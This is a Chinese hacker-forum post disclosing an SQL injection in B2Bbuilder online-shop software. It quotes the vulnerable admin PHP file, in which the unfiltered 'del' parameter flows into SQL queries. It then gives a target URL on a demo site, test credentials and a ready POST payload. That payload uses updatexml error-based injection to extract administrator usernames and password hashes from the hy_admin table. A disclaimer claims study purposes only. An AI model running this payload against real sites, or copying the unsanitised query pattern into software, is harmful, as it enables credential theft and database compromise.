B2Bbuilder网上商城通用注入漏洞【一】 - 中国红客帝国官网-Honker EmPire For China - Powered by H.E.C
网络爱好者的栖息之地,让我们的网络技术更上一层楼!!!

B2Bbuilder网上商城通用注入漏洞【一】

无法 渗透提权

<?php

 

$status=array('-1'=>lang_show('notpass'),'0'=>lang_show('wpass'),'1'=>lang_show('auditpass'));

 

if(isset($_GET['step']))

 

{

 

    if($_GET['step']=="del")

 

    {

 

        $db->query("delete from ".CERTIFICATION." where id='$_GET[deid]'");

 

        $sql="update ".COMPANY." set certification='0' where company_id in (select company_id from ".CERTIFICATION." where id='$_GET[deid]')";

 

        $db->query($sql);

 

    }

 

}

 

if(isset($_POST['del']))

 

{

 

    $ids=implode(",",$_POST['del'])

   $sql="update  ".CERTIFICATION." set statu=1 where id in ($ids)";

 

    $db->query($sql);

 

 

 

    $sql="update ".COMPANY." set certification='1' where company_id in (select company_id from ".CERTIFICATION." where id in ($ids))";

 

    $db->query($sql);

 

}

 

?>

漏洞目录: module\company\admin\business_info_list.php

 

我们先来看看这个PHP页面,其中del未能过滤导致造成sql注入.

 

 

下面是构造注入语句:

 我们用demo测试

 

http://democn.b2b-builder.com

账号密码 test test

 

构造url

 

http://democn.b2b-builder.com/main.php?m=company&s=admin/business_info_list

post数据包为

 

del[]=1) or updatexml(2,concat(0x7e,((select group_concat(user,0x5e,password) from hy_admin))),0) %23&updateID=11&cc=1111

1.png
标签: 通用SQL注入

免责声明:

本站提供的资源,都来自网络,版权争议与本站无关,所有内容及软件的文章仅限用于学习和研究目的。不得将上述内容用于商业或者非法用途,否则,一切后果请用户自负,我们不保证内容的长久可用性,通过使用本站内容随之而来的风险与本站无关,您必须在下载后的24个小时之内,从您的电脑/手机中彻底删除上述内容。如果您喜欢该程序,请支持正版软件,购买注册,得到更好的正版服务。侵删请致信E-mail:22365412@qq.com

同类推荐
评论列表

    无法  沙发 发表于2018-02-14 01:19 @回复
    4454